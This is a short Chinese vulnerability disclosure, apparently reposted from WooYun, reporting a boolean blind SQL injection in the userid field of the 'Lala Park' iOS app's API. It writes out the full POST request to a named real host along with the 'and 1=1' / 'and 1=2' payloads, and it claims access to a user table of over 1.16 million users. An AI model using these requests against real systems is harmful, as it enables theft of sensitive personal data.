记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

拉拉公园IOS APP一处SQL注入(涉及116W+用户数据)

2016-05-23 09:00

目标:拉拉公园IOS APP

检测发现以下地方存在SQL注入:(POST中的user_id,布尔盲注)

code 区域
POST http://les998.com/AppServer/member.php/nearbymembers HTTP/1.1

LES998AUTHORIZATIONINFO: iPhone<>9.3.1<>1.4<>114.035898<>22.614044<>

User-Agent: App/1.5 (iPhone; iOS 9.3.1; Scale/2.00)

Content-Type: application/json

Content-Length: 131

Host: les998.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

Accept: */*



{"userid":"163386","cityid":-1,"endage":-1,"offset":0,"pagesize":20,"lovesort":-1,"group":0,"startage":-1,"provinceid":-1}



Payload:

code 区域
"userid":"163386 and 1=1"



code 区域
"userid":"163386 and 1=2"

漏洞证明:

1、当前数据库用户

user.jpg



2、所有数据库

dbs.jpg



3、用户表,涉及116W+用户数据

QQ截图20160517211827.jpg

修复方案:

请多指教~


知识来源: www.wooyun.org/bugs/wooyun-2016-0209871

阅读:127530 | 评论:0 | 标签:注入 iOS

想收藏或者和大家分享这篇好文章→复制链接地址

“拉拉公园IOS APP一处SQL注入(涉及116W+用户数据)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云